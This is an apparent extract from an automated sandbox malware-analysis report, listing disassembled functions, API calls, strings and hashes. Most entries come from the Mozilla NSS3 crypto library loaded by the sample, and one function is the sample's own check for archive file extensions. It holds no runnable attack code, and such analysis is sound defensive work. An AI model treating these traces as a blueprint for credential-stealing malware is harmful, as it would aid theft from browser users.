strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C3EDEB4
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C3EDEC3
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C3EDED8
PR_smprintf.NSS3(%s%s,?,?), ref: 6C3EDEF0
PR_smprintf.NSS3(6C51AAF9,(NULL) (Validity Unknown)), ref: 6C3EDF04
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C3EDF13
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C3EDF22
memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6C3EDF33
free.MOZGLUE(00000000), ref: 6C3EDF3C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C3EDF4B
free.MOZGLUE(00000000), ref: 6C3EDF74
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C3EDF8E

Strings

{???}, xrefs: 6C3EDE8B
(NULL) (Validity Unknown), xrefs: 6C3EDEFA
%s%s, xrefs: 6C3EDEEB

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
String ID: %s%s$(NULL) (Validity Unknown)${???}
API String ID: 1882561532-3437882492
Opcode ID: 75e2cee2b6e68a8cf345a0e64ae13e8054d433affe8e9c7d7868225d2fedeb9e
Instruction ID: c0d0869f0f716ef0264a0e7608101b514db52e91310e38bcea9f01b595a93f74
Opcode Fuzzy Hash: 75e2cee2b6e68a8cf345a0e64ae13e8054d433affe8e9c7d7868225d2fedeb9e
Instruction Fuzzy Hash: A851A2B1E002155BDB00DE659C45EAF7AF8EFD9359F144029E809E7B01E731D915CBE2

Function 6C422D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C422DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C422E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C422E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C422E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C3F4F1C,?,-00000001,00000000,?), ref: 6C422E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C3F4F1C,?,-00000001,00000000), ref: 6C422E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C422EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C422EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C422EF8
PR_Unlock.NSS3(?), ref: 6C422F62
TlsGetValue.KERNEL32 ref: 6C422F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6C422F9E
PR_Unlock.NSS3(?), ref: 6C422FCA
TlsGetValue.KERNEL32 ref: 6C42301A
EnterCriticalSection.KERNEL32(?), ref: 6C42302E
PR_Unlock.NSS3(?), ref: 6C423066
PR_SetError.NSS3(00000000,00000000), ref: 6C423085
PR_Unlock.NSS3(?), ref: 6C4230EC
TlsGetValue.KERNEL32 ref: 6C42310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6C423124
PR_Unlock.NSS3(?), ref: 6C42314C

Part of subcall function 6C409180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C43379E,?,6C409568,00000000,?,6C43379E,?,00000001,?), ref: 6C40918D
Part of subcall function 6C409180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C43379E,?,6C409568,00000000,?,6C43379E,?,00000001,?), ref: 6C4091A0

Part of subcall function 6C3D07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C36204A), ref: 6C3D07AD
Part of subcall function 6C3D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C36204A), ref: 6C3D07CD
Part of subcall function 6C3D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C36204A), ref: 6C3D07D6
Part of subcall function 6C3D07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C36204A), ref: 6C3D07E4
Part of subcall function 6C3D07A0: TlsSetValue.KERNEL32(00000000,?,6C36204A), ref: 6C3D0864
Part of subcall function 6C3D07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C3D0880
Part of subcall function 6C3D07A0: TlsSetValue.KERNEL32(00000000,?,?,6C36204A), ref: 6C3D08CB
Part of subcall function 6C3D07A0: TlsGetValue.KERNEL32(?,?,6C36204A), ref: 6C3D08D7
Part of subcall function 6C3D07A0: TlsGetValue.KERNEL32(?,?,6C36204A), ref: 6C3D08FB

PR_SetError.NSS3(00000000,00000000), ref: 6C42316D

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: f9b7d224b00f6e99ccf0293b04b08f34fc2c1bdff77bb7a23ed300e437bd2332
Instruction ID: 374dc9a395ce2607a15e130b4413f369bade15a55cd2c387067b43ed0f6afe44
Opcode Fuzzy Hash: f9b7d224b00f6e99ccf0293b04b08f34fc2c1bdff77bb7a23ed300e437bd2332
Instruction Fuzzy Hash: B1F19CB1D002199FEF10EF64D845FAABBB4BF09318F054169EC04AB711EB35E995CB91

Function 6C416D60 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Digest), ref: 6C416D86
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C416DB4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C416DC3

Part of subcall function 6C4FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C4FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C416DD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C416DFA
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C416E13
PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6C416E2C
PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6C416E47
PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6C416EB9

Strings

nOl, xrefs: 6C416E61, 6C416E95
(CK_INVALID_HANDLE), xrefs: 6C416DBC
pulDigestLen = 0x%p, xrefs: 6C416E42
hSession = 0x%x, xrefs: 6C416D9E, 6C416DAE
pDigest = 0x%p, xrefs: 6C416E27
C_Digest, xrefs: 6C416D81
*pulDigestLen = 0x%x, xrefs: 6C416EB4
pData = 0x%p, xrefs: 6C416DF5
ulDataLen = %d, xrefs: 6C416E0E

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest$nOl
API String ID: 1003633598-1098229205
Opcode ID: df94b830bb6c8334444594c5929145a3c577b6923855d4a7b38dcfb7f35b9959
Instruction ID: 33fe84cb517142e6712b19c69a327061731fc7cb9512338db72ea851468d6c16
Opcode Fuzzy Hash: df94b830bb6c8334444594c5929145a3c577b6923855d4a7b38dcfb7f35b9959
Instruction Fuzzy Hash: A7419F35601114EBDB00EF54DD89F9A3BB5EB8271DF068029E848E7E12EB31D859CBD6

Function 6C419C40 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 118COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_LoginUser), ref: 6C419C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C419C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C419CA3

Part of subcall function 6C4FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C4FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C419CB9
PR_LogPrint.NSS3( userType = 0x%x,?), ref: 6C419CDA
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C419CF5
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C419D10
PR_LogPrint.NSS3( pUsername = 0x%p,?), ref: 6C419D29
PR_LogPrint.NSS3( ulUsernameLen = %d,?), ref: 6C419D42

Strings

nOl, xrefs: 6C419D5A, 6C419D91
(CK_INVALID_HANDLE), xrefs: 6C419C9C
ulPinLen = %d, xrefs: 6C419D0B
hSession = 0x%x, xrefs: 6C419C7E, 6C419C8E
ulUsernameLen = %d, xrefs: 6C419D3D
C_LoginUser, xrefs: 6C419C61
pPin = 0x%p, xrefs: 6C419CF0
pUsername = 0x%p, xrefs: 6C419D24
userType = 0x%x, xrefs: 6C419CD5

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ pUsername = 0x%p$ ulPinLen = %d$ ulUsernameLen = %d$ userType = 0x%x$ (CK_INVALID_HANDLE)$C_LoginUser$nOl
API String ID: 1003633598-3897343434
Opcode ID: 0e004fbb9b88046976409f707c97117e323dd15b74a22e12700b10ffb70d8f20
Instruction ID: 6a1452ccdc9fc13ac1b906e1aad92ef723edbc0c3c5287121a9f3c393abc9660
Opcode Fuzzy Hash: 0e004fbb9b88046976409f707c97117e323dd15b74a22e12700b10ffb70d8f20
Instruction Fuzzy Hash: 1A41F735605114EFDB00EF50DD48F9A3BB5EB9230EF068029E948A7F11E7319819CBD6

Function 6C424C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C424C4C
EnterCriticalSection.KERNEL32(?), ref: 6C424C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C424CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C424CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C424CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C424D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C424D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C424DB7

Part of subcall function 6C48DD70: TlsGetValue.KERNEL32 ref: 6C48DD8C
Part of subcall function 6C48DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C48DDB4

Part of subcall function 6C3D07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C36204A), ref: 6C3D07AD
Part of subcall function 6C3D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C36204A), ref: 6C3D07CD
Part of subcall function 6C3D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C36204A), ref: 6C3D07D6
Part of subcall function 6C3D07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C36204A), ref: 6C3D07E4
Part of subcall function 6C3D07A0: TlsSetValue.KERNEL32(00000000,?,6C36204A), ref: 6C3D0864
Part of subcall function 6C3D07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C3D0880
Part of subcall function 6C3D07A0: TlsSetValue.KERNEL32(00000000,?,?,6C36204A), ref: 6C3D08CB
Part of subcall function 6C3D07A0: TlsGetValue.KERNEL32(?,?,6C36204A), ref: 6C3D08D7
Part of subcall function 6C3D07A0: TlsGetValue.KERNEL32(?,?,6C36204A), ref: 6C3D08FB

TlsGetValue.KERNEL32 ref: 6C424DD7
EnterCriticalSection.KERNEL32(?), ref: 6C424DEC
PR_Unlock.NSS3(?), ref: 6C424E1B
PR_SetError.NSS3(00000000,00000000), ref: 6C424E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C424E5A
PR_SetError.NSS3(00000000,00000000), ref: 6C424E71
free.MOZGLUE(00000000), ref: 6C424E7A
PR_Unlock.NSS3(?), ref: 6C424EA2
TlsGetValue.KERNEL32 ref: 6C424EC1
EnterCriticalSection.KERNEL32(?), ref: 6C424ED6
PR_Unlock.NSS3(?), ref: 6C424F01
free.MOZGLUE(00000000), ref: 6C424F2A

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: 315c58655d9779d2aace0a376c7afc891733659bcf4a217dcd8ae970ba9cb9c0
Instruction ID: 5b0d3f6294a4c29a415b2d6f592678d798038385d83b9e5f38838a06a3d1ef5b
Opcode Fuzzy Hash: 315c58655d9779d2aace0a376c7afc891733659bcf4a217dcd8ae970ba9cb9c0
Instruction Fuzzy Hash: D0B10E71A002059FEB10EF28DC42FAA77B4FF45359F025128E9199BB40EB38E961CBD1

Function 6C3F5DB0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 238memoryCOMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C3F5DEC
PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6C3F5E0F
PORT_ZAlloc_Util.NSS3(00000828), ref: 6C3F5E35
SECKEY_CopyPublicKey.NSS3(?), ref: 6C3F5E6A
HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6C3F5EC3
NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6C3F5ED9
SECKEY_SignatureLen.NSS3(?), ref: 6C3F5F09
PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6C3F5F49
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C3F5F89
free.MOZGLUE(?), ref: 6C3F5FA0
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C3F5FB6
free.MOZGLUE(00000000), ref: 6C3F5FBF
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C3F600C
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C3F6079
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C3F6084
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C3F6094

Strings

, xrefs: 6C3F5EEB

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
String ID:
API String ID: 2310191401-3916222277
Opcode ID: fc40006e135934e4f9a254fee03463b3f4c1697e2995f55a347808d8dd76eba7
Instruction ID: 93b809b650a7d9a553fdb285ecdb394428101b0ea2ee9243bcc63b339ff299f1
Opcode Fuzzy Hash: fc40006e135934e4f9a254fee03463b3f4c1697e2995f55a347808d8dd76eba7
Instruction Fuzzy Hash: 3981D671E043059BEB10CA64CC80F9E77B5AF44318F148968E869E7791E732D916CFE2

Function 6C414CD0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C414CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C414D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C414D37

Part of subcall function 6C4FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C4FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C414D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C414D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C414D8A
PR_LogPrint.NSS3(?,00000000), ref: 6C414DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C414DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C414E20

Strings

nOl, xrefs: 6C414DD4, 6C414DFF
(CK_INVALID_HANDLE), xrefs: 6C414D30, 6C414D83
*pulSize = 0x%x, xrefs: 6C414E1B
hObject = 0x%x, xrefs: 6C414D65, 6C414D75
hSession = 0x%x, xrefs: 6C414D12, 6C414D22
C_GetObjectSize, xrefs: 6C414CEE
pulSize = 0x%p, xrefs: 6C414DB7

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize$nOl
API String ID: 1003633598-510776860
Opcode ID: 15aee9ec46614ad6baed5827ae182d54c5ef646c14a8231c5b9106485ff08dfc
Instruction ID: 84552511fc37ad4e5466c8628650fc804dab2c919eaaae3af1d41b7cc9a49028
Opcode Fuzzy Hash: 15aee9ec46614ad6baed5827ae182d54c5ef646c14a8231c5b9106485ff08dfc
Instruction Fuzzy Hash: D941D671605114EFDB00EF10DD88F6A37B5EB8234EF069029E848ABE11E7309949CB96

Function 6C417C90 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Verify), ref: 6C417CB6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C417CE4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C417CF3

Part of subcall function 6C4FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C4FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C417D09
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C417D2A
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C417D45
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C417D5E
PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6C417D77

Strings

nOl, xrefs: 6C417D8F, 6C417DC3
(CK_INVALID_HANDLE), xrefs: 6C417CEC
pSignature = 0x%p, xrefs: 6C417D59
hSession = 0x%x, xrefs: 6C417CCE, 6C417CDE
ulSignatureLen = %d, xrefs: 6C417D72
C_Verify, xrefs: 6C417CB1
pData = 0x%p, xrefs: 6C417D25
ulDataLen = %d, xrefs: 6C417D40

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pSignature = 0x%p$ ulDataLen = %d$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_Verify$nOl
API String ID: 1003633598-4276722125
Opcode ID: 718324033c81afa4c4430c18718d4dd2125772331856b44f71c7d288076b89e2
Instruction ID: e66d60806adc331db8029b24fe70c6785542cbca1db652b82f3f358af015d4f4
Opcode Fuzzy Hash: 718324033c81afa4c4430c18718d4dd2125772331856b44f71c7d288076b89e2
Instruction Fuzzy Hash: 7331C331605158EFDB10EF54DD88F6A37F1EB8231DF0A8068E84897E11EB309849CBE6

Function 0062D052 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,759183C0,00000000,0062DD3D,?), ref: 0062D057
StrCmpCA.SHLWAPI(759183C0,006471AC), ref: 0062D085
StrCmpCA.SHLWAPI(759183C0,.zip), ref: 0062D095
StrCmpCA.SHLWAPI(759183C0,.zoo), ref: 0062D0A1
StrCmpCA.SHLWAPI(759183C0,.arc), ref: 0062D0AD
StrCmpCA.SHLWAPI(759183C0,.lzh), ref: 0062D0B9
StrCmpCA.SHLWAPI(759183C0,.arj), ref: 0062D0C5
StrCmpCA.SHLWAPI(759183C0,.gz), ref: 0062D0D1
StrCmpCA.SHLWAPI(759183C0,.tgz), ref: 0062D0DD

Strings

.zoo, xrefs: 0062D09B
.gz, xrefs: 0062D0CB
.arc, xrefs: 0062D0A7
.lzh, xrefs: 0062D0B3
.arj, xrefs: 0062D0BF
.zip, xrefs: 0062D08F
.tgz, xrefs: 0062D0D7

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
API String ID: 1659193697-51310709
Opcode ID: 8bb6f141a3aecc041f54119bd789e6959853fdf69bbf4d4f2e32736afffa79cd
Instruction ID: 355450047883becb95468e9c242ad8607a777dfe8a003830151ebf87a86dee75
Opcode Fuzzy Hash: 8bb6f141a3aecc041f54119bd789e6959853fdf69bbf4d4f2e32736afffa79cd
Instruction Fuzzy Hash: 17014420A89F77716B322E357D45EFF1E5B8E83FC0F060925E800E61A5DB8498875DB5

Function 6C4F9C60 Relevance: 27.2, APIs: 18, Instructions: 202threadCOMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000080), ref: 6C4F9C70
PR_NewLock.NSS3 ref: 6C4F9C85

Part of subcall function 6C4A98D0: calloc.MOZGLUE(00000001,00000084,6C3D0936,00000001,?,6C3D102C), ref: 6C4A98E5

PR_NewCondVar.NSS3(00000000), ref: 6C4F9C96

Part of subcall function 6C3CBB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C3D21BC), ref: 6C3CBB8C

PR_NewLock.NSS3 ref: 6C4F9CA9

Part of subcall function 6C4A98D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C4A9946
Part of subcall function 6C4A98D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C3616B7,00000000), ref: 6C4A994E
Part of subcall function 6C4A98D0: free.MOZGLUE(00000000), ref: 6C4A995E

PR_NewLock.NSS3 ref: 6C4F9CB9
PR_NewLock.NSS3 ref: 6C4F9CC9
PR_NewCondVar.NSS3(00000000), ref: 6C4F9CDA

Part of subcall function 6C3CBB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C3CBBEB
